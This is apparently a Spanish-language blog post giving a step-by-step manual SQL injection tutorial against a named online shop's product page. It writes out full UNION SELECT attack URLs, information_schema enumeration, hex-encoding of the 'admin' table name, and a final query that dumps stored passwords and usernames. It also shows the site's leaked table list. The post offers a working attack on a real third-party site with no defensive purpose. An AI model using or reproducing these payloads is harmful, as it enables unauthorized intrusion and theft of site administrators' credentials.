Hacer Inyecciones SQL Manual



buscamos la pagina vulne..  para hacerle la inyeccion manual no soy muy muy bueno hablando mucho empezemos

colocamos una comilla  (') para saber si es vulnerable a inyeccion SQL haci

http://www.aviacionshop.com.ar/ficha.php?id='8

mysql_fetch_assoc () espera parámetro de 1 a ser el recurso, boolean given en /www/zucodavid/aviacion/ficha.php en la línea 26

ponemos en el navegador y ponemos "order by 1" hasta encontrar el error
"order by 1"
"order by 10"
"order by 13"
"order by 8" <--- el numero de la base de dato
http://www.aviacionshop.com.ar/ficha.php?id=-8+order+by+16/*

entonces ponemos "union+ select+ hasta el 8"
http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+1,2,3,4,5,6,7,8

pues como vemos nos tiro la el numero "6" pues ahora penetramos por ese numero que nos lanzo
en el numero "6" ponemos esto "replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29" y al
final entonce ponemos " +from+information_schema.tables--
"
quedara haci

http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+ 1,2,3,4,5,replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29,7,8+ +from+information_schema.tables--

como vemos nos acaba de mostrar su "Database"

"Database"

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_BUFFER_PAGE
INNODB_TRX
INNODB_BUFFER_POOL_STATS
INNODB_LOCK_WAITS
INNODB_CMPMEM
INNODB_CMP
INNODB_LOCKS
INNODB_CMPMEM_RESET
INNODB_CMP_RESET
INNODB_BUFFER_PAGE_LRU
admin 
banner
galeria
textos
admin
banners
categorias
clientes
envio
orden_detalles
ordenes
pago
productos
textoa
--------------
bueno aqui como vemos nos mostro toda la 
Database   lo que nos interesa es el "admin"entramos a esta pagina para convertir nuestro admin en  "Hex" que serian unos  codigos para luego penetrar 
http://www.swingnote.com/tools/texttohex.php

este seria el codigo Hex: "61646d696e"  ahora ahora borramos esta linea
replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29
y lo remplazamos por "column_name"
remplazamos (from+information_schema.tables)  por esto mas con el codigo de admin

columns+where(table_name=0xa el codigo ba aqui )limit+1,1--
columns+where(table_name=0x61646d696e)limit+1,1--

quedaria haci

http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+ 1,2,3,4,5,+column_name,7,8+ +from+information_schema.columns+where(table_name=0x61646d696e)limit+1,1--

entonce vamos buscando cambiando el
"limit+1,1"--
"limit+1,2"--
"limit+1,3"--

en cada uno de esos numero nos aparecera ya sea "Email" ,oh "username" password" ect
lo gramos encontrar el "username y password" que es la que nos interesa

ahora remplazamos "column_name" por  group_concat(password,0x3a,username )

http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+ 1,2,3,4,5,+ group_concat(password,0x3a,username ),7,8+from admin--+

nos debe mostrar el username y el passwor












0 comentarios:

Publicar un comentario